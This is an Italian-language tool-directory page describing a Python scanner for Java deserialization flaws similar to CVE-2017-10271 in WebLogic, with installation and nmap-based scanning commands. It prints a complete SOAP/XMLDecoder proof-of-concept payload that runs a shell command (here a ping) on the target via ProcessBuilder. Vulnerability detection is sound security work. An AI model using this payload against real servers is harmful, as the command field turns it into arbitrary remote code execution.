Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
JavaDeserialization — Uno scanner di vulnerabilità di deserializzazione Java mirato a vulnerabilità simili a CVE-2017-10271. | Kitploit
Strumenti/GitHubGitHub/etocheney/javadeserialization
Scanner di VulnerabilitàMappatura della ReteGenerazione di PayloadScansione PorteExploitSfruttamento di Applicazioni Web
GitHubetocheney/javadeserialization

JavaDeserialization

Uno scanner di vulnerabilità di deserializzazione Java mirato a vulnerabilità simili a CVE-2017-10271.

Vedi Repository
91127 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Rilevamento della vulnerabilità di deserializzazione Java

Scanner per la vulnerabilità di deserializzazione Java, specifico per vulnerabilità simili a CVE-2017-10271. Questo progetto contiene una sola PoC; le altre non sono ancora state organizzate.

Installazione

  1. Installare nmap

    https://nmap.org/download.html Scaricare e installare la versione appropriata in base al proprio sistema operativo.

  2. Installare i pacchetti di terze parti

    pip install -r requirements.txt

  3. Scansione

    Modificare la PoC, cambiando l'indirizzo IP nel comando ping con il proprio indirizzo IP

    Modificare il codice sniff alla riga 25

    root@kitploit:~
    sniff(filter='icmp and yourIP',prn=packet_callback)
    

    java_scan.py -i IP地址 [options] java_scan.py -h 获得帮助

Utilizzo

1. PoC

Prima dell'uso è obbligatorio modificare la PoC, cambiando l'indirizzo IP nel comando ping con il proprio indirizzo IP

La PoC è composta da due file in formato JSON, rispettivamente per Windows e Linux (attualmente non è stata aggiunta la funzionalità per specificare il percorso della PoC; sarà aggiunta nelle versioni successive). Assicurarsi di nominare le PoC come poc.json e poc_win.json nella directory del programma.

Informazioni sul formato della PoC (versione Linux; la versione Windows è simile)

root@kitploit:~
{
  "url":"wls-wsat/CoordinatorPortType",
  "header": "Content-Type:text/xml",
  "data": [
    "<soapenv:Envelope xmlns:soapenv='http://schemas.xmlsoap.org/soap/envelope/'>",
        "<soapenv:Header>",
            "<work:WorkContext xmlns:work='http://bea.com/2004/06/soap/workarea/'>",
               "<java version='1.8.0_131' class='java.beans.XMLDecoder'>",
                    "<void class='java.lang.ProcessBuilder'>",
                        "<array class='java.lang.String' length='3'>",
                            "<void index='0'>",
                                "<string>/bin/bash</string>",
                            "</void>",
                            "<void index='1'>",
                                "<string>-c</string>",
                            "</void>",
                            "<void index='2'>",
                                "<string>ping 10.60.18.5 -c 2</string>",
                            "</void>",
                        "</array>",
                    "<void method='start'/></void>",
                "</java>",
            "</work:WorkContext>",
        "</soapenv:Header>",
        "<soapenv:Body/>",
    "</soapenv:Envelope>"
  ]
}

url specifica la directory di sfruttamento della vulnerabilità, header specifica il contenuto dell'header aggiunto al pacchetto POST, data è il contenuto serializzato da inviare.

Nota: questa PoC deve far sì che l'host vulnerabile risponda con 2 pacchetti ping; il programma può confermare l'esistenza della vulnerabilità solo quando rileva pacchetti ICMP.

2. Utilizzare nmap per scansionare la rete locale

Per impostazione predefinita, il programma esegue la scansione della rete locale utilizzando nmap

root@kitploit:~
java_scan.py -i 192.168.0.1

Questa scansione verifica la porta 7001 dell'host 192.168.0.1

3. Specificare IP e porta

Specificare un singolo IP e una singola porta

java_scan.py -i 192.168.0.1 -p 7001

Specificare più IP e più porte

java_scan.py -i 192.168.0.1,2,55 -p 7001,8001,9001

Specificare un intervallo di IP e un intervallo di porte

java_scan.py -i 192.168.0.1-255 -p 7000-8000

4. Rilevamento rapido delle porte aperte

Utilizzando il parametro -f, viene chiamato socket per eseguire un rilevamento rapido delle porte

java_scan.py -i 192.168.0.1-255 -p 7001 -f

Specificare il numero di thread per il rilevamento rapido delle porte

java_scan.py -i 192.168.0.1-255 -p 7001 -f -t 100

5. Risultato

effect

Scarica lo strumento